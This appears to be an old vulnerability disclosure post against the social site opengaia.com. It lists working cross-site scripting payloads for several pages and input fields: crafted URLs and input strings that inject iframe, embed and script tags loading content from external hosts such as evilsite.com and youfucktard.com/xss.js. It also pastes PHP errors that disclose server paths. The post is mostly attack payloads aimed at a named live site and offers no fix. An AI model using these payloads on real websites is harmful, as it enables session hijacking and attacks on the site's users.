Opengaia.com Homepage: http://www.opengaia.com Effected files: my_page.php module.php editing your profile the search input box adding a diary/blog ------------------------------------ Just like in onlinenode.com's vulnerabilities, it seems this site filters data just about the same. Below is one way to create a XSS vuln by closing quotes and using an open ended iframe. http://www.opengaia.com/my_page.php?viewed_id=6871";>'>'><iframe%20src=http://evilsite.com/scriptlet.html%20<<BR><BR>&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274 <embed> tags also workin each .php file. Example: http://www.opengaia.com/my_page.php?viewed_id=6871''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<""> Module.php XSS Vuln: It seems with this code, we'll get a php error with full path disclosure and the xss won't work: http://www.opengaia.com/modele.php?connection=1&name=%27%27%22%3C%22%27%3E%3Ciframe%2520src%3Dhttp%3A%2F%2Fevilsite.com%2Fscriptlet.html%2520%3C%5C Warning: main(./): failed to open stream: Success in /home/user/public_html/modele.php on line 243 Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 243 Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/encoree/public_html/modele.php on line 243 Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247 Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247 Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/user/ public_html/modele.php on line 247 modele.php XSS Vuln using iframe tag: http://www.opengaia.com/modele.php?connection=1&name=%22%3E%27%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%22&password=&object_menu=&right=accueil.php&left=bienvenue.php&page=home&viewed_id=&fond=cccccc&langue=en&object_type=&filtre= ------------------------------------- Editing your profile XSS with PHP Session included: It seems the input boxes of editing your profile don't properlly filter user input before generating it. For a PoC example we will use end tags and put <script> tags to bypass this filter: '>"><""><SCRIPT SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<""> Screenshots of PoC in action: http://www.youfucktard.com/xsp/gaia2.jpg http://www.youfucktard.com/xsp/gaia3.jpg http://www.youfucktard.com/xsp/gaia3.jpg ----------------------------------- Search input box XSS Vuln PoC: in the search boxtry putting: <iframe src=http://www.evilsite.com/scriptlet.html < --------------------------------- Data isn't properly filtered when adding a diary/blog as well. for PoC try putting: <iframe src=http://evilsite.com/scriptlet.html <
